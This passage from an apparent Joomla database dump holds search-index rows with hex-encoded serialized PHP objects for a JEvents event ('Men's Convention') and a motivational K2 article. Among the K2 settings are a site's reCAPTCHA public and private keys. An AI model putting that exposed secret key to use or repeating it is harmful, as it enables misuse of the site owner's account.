56420666f72204a6f6f6d6c61223b733a31393a22636f6d5f7273735f6465736372697074696f6e223b733a31393a22506f7765726564206279204a4576656e747321223b733a31383a22636f6d5f7273735f6c696d69745f74657874223b733a313a2230223b733a31393a22636f6d5f7273735f746578745f6c656e677468223b733a323a223230223b733a31323a22636f6d5f7273735f6c6f676f223b733a303a22223b733a393a22636f6d5f6361636865223b733a313a2230223b733a363a226e6577736566223b733a313a2231223b733a31353a22636f6d5f626c6f636b526f626f7473223b733a313a2231223b733a31303a22726f626f747072696f72223b733a383a222d31206d6f6e7468223b733a393a22726f626f74706f7374223b733a383a222b31206d6f6e7468223b733a31343a227265646972656374726f626f7473223b733a313a2230223b733a31333a22726f626f746d656e756974656d223b733a303a22223b733a383a22626c6f636b616c6c223b733a313a2230223b733a31373a226c61726765446174615365744c696d6974223b733a363a22313030303030223b733a32303a226d6f6463616c5f446973704c6173744d6f6e7468223b733a323a224e4f223b733a32343a226d6f6463616c5f446973704c6173744d6f6e746844617973223b733a313a2230223b733a32303a226d6f6463616c5f446973704e6578744d6f6e7468223b733a323a224e4f223b733a32343a226d6f6463616c5f446973704e6578744d6f6e746844617973223b733a313a2230223b733a31393a226d6f6463616c5f4c696e6b436c6f616b696e67223b733a313a2230223b733a31393a226d6f646c61746573745f4d61784576656e7473223b733a323a223130223b733a31343a226d6f646c61746573745f4d6f6465223b733a313a2230223b733a31343a226d6f646c61746573745f44617973223b733a313a2235223b733a383a2273746172746e6f77223b733a313a2230223b733a31383a226d6f646c61746573745f4e6f526570656174223b733a313a2231223b733a31383a226d6f646c61746573745f4469737059656172223b733a313a2230223b733a31383a226d6f646c61746573745f6d756c7469646179223b733a313a2230223b733a31393a226d6f646c61746573745f446973704c696e6b73223b733a313a2231223b733a32323a226d6f646c61746573745f446973446174655374796c65223b733a313a2230223b733a32333a226d6f646c61746573745f4469735469746c655374796c65223b733a313a2230223b733a31393a226d6f646c61746573745f4c696e6b546f43616c223b733a313a2230223b733a32313a226d6f646c61746573745f536f727452657665727365223b733a313a2230223b733a32323a226d6f646c61746573745f4c696e6b436c6f616b696e67223b733a313a2230223b733a32303a226d6f646c61746573745f43757374466d74537472223b733a34393a22247b6576656e74446174657d5b21613a202d20247b656e64446174652825493a254d2570297d5d0d0a247b7469746c657d223b733a31333a226d6f646c61746573745f525353223b733a313a2230223b733a32343a226d6f646c61746573745f636f6e74656e74706c7567696e73223b733a313a2230223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a303a7b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a343a2270617468223b733a33373a22636f6d706f6e656e742f6a6576656e74732f6576656e742f31322f2d3f4974656d69643d30223b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a333a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a323a7b733a343a2254797065223b613a313a7b733a353a224576656e74223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224576656e74223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a2243617465676f7279223b613a313a7b733a343a224c4f4943223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a343a224c4f4943223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a36373a22696e6465782e7068703f6f7074696f6e3d636f6d5f6a6576656e7473267461736b3d6963616c6576656e742e64657461696c26657669643d3132264974656d69643d30223b733a353a22726f757465223b733a36373a22696e6465782e7068703f6f7074696f6e3d636f6d5f6a6576656e7473267461736b3d6963616c6576656e742e64657461696c26657669643d3132264974656d69643d30223b733a353a227469746c65223b733a31363a224d656e277320436f6e76656e74696f6e223b733a31313a226465736372697074696f6e223b733a303a22223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b733a313a2231223b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30312d30312031313a32323a3436223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22323039392d31322d33312030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a313b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(159, 'index.php?option=com_k2&view=item&id=1', 'index.php?option=com_k2&view=item&id=1:make-that-idea-your-life', 'Make that idea your life', ' Do not dwell in the past, do not dream of the future, concentrate the mind on the present moment. Never be bullied into silence. Never allow yourself to be made a victim. Accept no one\'s definition of your life; define yourself. Don\'t go around saying th', '2017-03-20 18:38:47', '36d5ab7ac4aeca67ddf388c929c0ac9c', 1, 0, 1, '*', '2013-01-03 00:00:00', '0000-00-00 00:00:00', '2013-01-03 00:00:00', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a313a2231223b733a353a22616c696173223b733a32343a226d616b652d746861742d696465612d796f75722d6c696665223b733a373a2273756d6d617279223b733a3539323a223c7020636c6173733d2264726f70636170223e446f206e6f74206477656c6c20696e2074686520706173742c20646f206e6f7420647265616d206f6620746865206675747572652c20636f6e63656e747261746520746865206d696e64206f6e207468652070726573656e74206d6f6d656e742e204e657665722062652062756c6c69656420696e746f2073696c656e63652e204e6576657220616c6c6f7720796f757273656c6620746f206265206d61646520612076696374696d2e20416363657074206e6f206f6e65277320646566696e6974696f6e206f6620796f7572206c6966653b20646566696e6520796f757273656c662e3c2f703e0d0a3c703e446f6e277420676f2061726f756e6420736179696e672074686520776f726c64206f77657320796f752061206c6976696e672e2054686520776f726c64206f77657320796f75206e6f7468696e672e2049742077617320686572652066697273742e20496620796f7520646f6e2774206c696b6520736f6d657468696e672c206368616e67652069742e20496620796f752063616e2774206368616e67652069742c206368616e676520796f75722061747469747564652e204368616e67652077696c6c206e6f7420636f6d65206966207765207761697420666f7220736f6d65206f7468657220706572736f6e206f7220736f6d65206f746865722074696d652e2057652061726520746865206f6e6573207765277665206265656e2077616974696e6720666f722e2057652061726520746865206368616e67652074686174207765207365656b2e3c2f703e0d0a223b733a343a22626f6479223b733a3536393a220d0a3c703e4974206973206e6f7420746865207374726f6e67657374206f6620746865207370656369657320746861742073757276697665732c206e6f7220746865206d6f737420696e74656c6c6967656e7420746861742073757276697665732e20497420697320746865206f6e65207468617420697320746865206d6f737420616461707461626c6520746f206368616e67652e20416c6c206368616e6765732c206576656e20746865206d6f7374206c6f6e67656420666f722c2068617665207468656972206d656c616e63686f6c793b20666f722077686174207765206c6561766520626568696e6420757320697320612070617274206f66206f757273656c7665733b207765206d7573742064696520746f206f6e65206c696665206265666f72652077652063616e20656e74657220616e6f746865722e3c2f703e0d0a3c703e54616b65207570206f6e6520696465612e204d616b652074686174206f6e65206964656120796f7572206c696665202d207468696e6b206f662069742c20647265616d206f662069742c206c697665206f6e207468617420696465612e204c65742074686520627261696e2c206d7573636c65732c206e65727665732c2065766572792070617274206f6620796f757220626f64792c2062652066756c6c206f66207468617420696465612c20616e64206a757374206c65617665206576657279206f74686572206964656120616c6f6e652e2054686973206973207468652077617920746f20737563636573732e3c2f703e223b733a353a226361746964223b733a313a2234223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031362d31322d33312031383a35363a3130223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a227264617465223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2230223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2231223b733a353a227472617368223b733a313a2231223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a383a2246696e616e636573223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a323a223120223b733a31323a2265787472615f6669656c6473223b733a32343a225b7b226964223a2231222c2276616c7565223a2231227d5d223b733a343a22736c7567223b733a32363a22313a6d616b652d746861742d696465612d796f75722d6c696665223b733a373a22636174736c7567223b733a31303a22343a66696e616e636573223b733a363a22617574686f72223b733a31393a22526576204f6c75736f6c612041796f64656c65223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a34343a22636f6d706f6e656e742f6b322f6974656d2f312d6d616b652d746861742d696465612d796f75722d6c696665223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a31393a22526576204f6c75736f6c612041796f64656c65223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31393a22526576204f6c75736f6c612041796f64656c65223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a383a2246696e616e636573223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a383a2246696e616e636573223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a32343a225b7b226964223a2231222c2276616c7565223a2231227d5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32343a225b7b226964223a2231222c2276616c7565223a2231227d5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33383a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d31223b733a353a22726f757465223b733a36333a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d313a6d616b652d746861742d696465612d796f75722d6c696665223b733a353a227469746c65223b733a32343a224d616b652074686174206964656120796f7572206c